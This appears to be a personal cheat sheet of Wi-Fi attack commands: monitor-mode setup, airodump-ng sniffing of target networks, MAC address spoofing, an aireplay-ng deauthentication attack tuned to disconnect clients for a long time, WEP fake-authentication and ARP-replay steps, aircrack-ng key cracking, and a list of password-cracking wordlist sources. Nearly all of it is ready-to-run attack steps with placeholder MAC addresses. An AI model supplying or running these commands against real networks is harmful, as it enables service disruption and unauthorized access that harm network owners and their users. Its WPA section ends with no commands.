note: its my personal research so there can be errors or more fast and powerful method available to do same attacks

Commands Related to Network Attacks:#

packet sniffing : airodump-ng [monitor mode interface]#

first enable monitor mode; then

  • ifconfig wlan0 down

  • airmon-ng check kill ( to kill the manager)

  • iwconfig wlan0 mode monitor

  • ifconfig wlan0 up

  • iwconfig ( to check)

network preconnection attack.txt#

note: need monitor mode on

  • airodump-ng wlan0 ( discover all wireless network and info around it)

sniff and discover 5Ghz networks

  • airodump-ng --band a wlan0 (a = 5Ghz)

for sniffing multiple bands ( 2.4 & 5)

  • airodump-ng --band abg wlan0 ( all frequency)

*to siff only target network **

  • airodump-ng --bssid XX:XX:XX:XX:XX:XX --channel X --write test wlan0

{ “channel” for airodump-ng to sniff on and “write” for storing data in file (xxxx.cap)}

  • wireshark ( to lauch wireshark or can open manually to check the xxxx.cap file filled with target data)

change your mac adresss:#

  • ifconfig wlan0 down (to make wlan0 down)

  • ifconfig wlan0 hw ether XX:XX:XX:XX:XX:XX ( random mac address)

  • ifconfig wlan0 up (to make wlan0 up again)

  • ifconfig ( *to check *) ``

deauthentication attack ( disconnect any client form any network)#

  • aireplay-ng --deauth [deauth Pacekts] -a [Network Mac add] -c [Target Mac add] [Interface]

run airodump-ng in parallel terminal against the target network

  • airodump-ng --bssid XX:XX:XX:XX:XX:XX --channel X wlan0 (no need of –write if u dont want file)

  • aireplay-ng --deauth 100000000 -a XX:XX:XX:XX:XX:XX -c XX:XX:XX:XX:XX:XX -D wlan0

{ 100000000 give max packets to deauth for long time; “-D” if client is on 5Ghz network and if its in 2.4Ghz then remove the “-D”}

if client still has access to other networks then split the terminal and run same attack parallel on that network

Fake authentication attack (wep)#

forcing AP to generate new packets with new IVs

  • aireplay-ng --fakeauth 0 -a [network Mac add] -h[our Mac add] wlan0

  • airodump-ng --bssid XX:XX:XX:XX:XX:XX --channel x --write xxxx wlan0 (sniffing target network with storing data and running parallely)

  • aireplay-ng --fakeauth 0 -a XX:XX:XX:XX:XX:XX -h XX:XX:XX:XX:XX:XX wlan0 (0 for doing fake authentication attack once )

running arpreplay attack

  • aireplay-ng --arpreplay -b XX:XX:XX:XX:XX:XX -h XX:XX:XX:XX:XX:XX wlan0

associate data 1 more time

  • aireplay-ng --fakeauth 0 -a XX:XX:XX:XX:XX:XX -h XX:XX:XX:XX:XX:XX wlan0

  • aircrack-ng xxxx.cap

Gainning access (wep cracking)#

needs to capture large no. of packets iv is too small(24 bits) iv is sent in plain text

to capture large no. of packets/IVs —> using airodump-ng to analyse the captured packets/IVs and crack the key —-> using aircrack-ng

step1: *wireless adapter in monitor mode

  • airodump-ng wlan0 ( discover all wireless network and info around it in parallel terminal)

  • airodump-ng --bssid XX:XX:XX:XX:XX:XX --channel X --write test wlan0
    ( to capture packets of specefic target network and “–write” to sotred data in file)


  • aircrack-ng xxxx.cap (xxxx.cap = file name)

will get key and ascii password, can connect through both and for key remove the colon

wpa/wpa2 cracking#

*both can be cracked using the same methods

made to adress the issues in wep

much more secure

each packet is encrypted using a unique temporary key

packet contains no useful information*


Openwall Wordlists
Use: Offers a variety of password cracking wordlists for security testing and penetration testing.

Openwall Mirrors
Use: Mirror site for Openwall’s tools, providing easy access to its resources, including wordlists.

SecLists on GitHub
Use: A collection of security-related wordlists for various penetration testing needs, like password cracking and directory brute forcing.

Outpost9 Wordlists
Use: Provides password wordlists for cracking and penetration testing.

Vulnerability Assessment Passwords
Use: Offers password wordlists for vulnerability assessments and security testing.

Packet Storm Wordlists
Use: A trusted resource offering various wordlists for security professionals, particularly for cracking passwords.

Moby Wordlists
Use: Large collections of English wordlists used in password cracking and natural language processing tasks.

Cotse Wordlists 1
Use: Provides wordlists for security testing, including common passwords and user names.

Cotse Wordlists 2
Use: Additional wordlists for password cracking and penetration testing.

Wordlist Project
Use: A SourceForge project offering a variety of wordlists for password cracking and security testing.
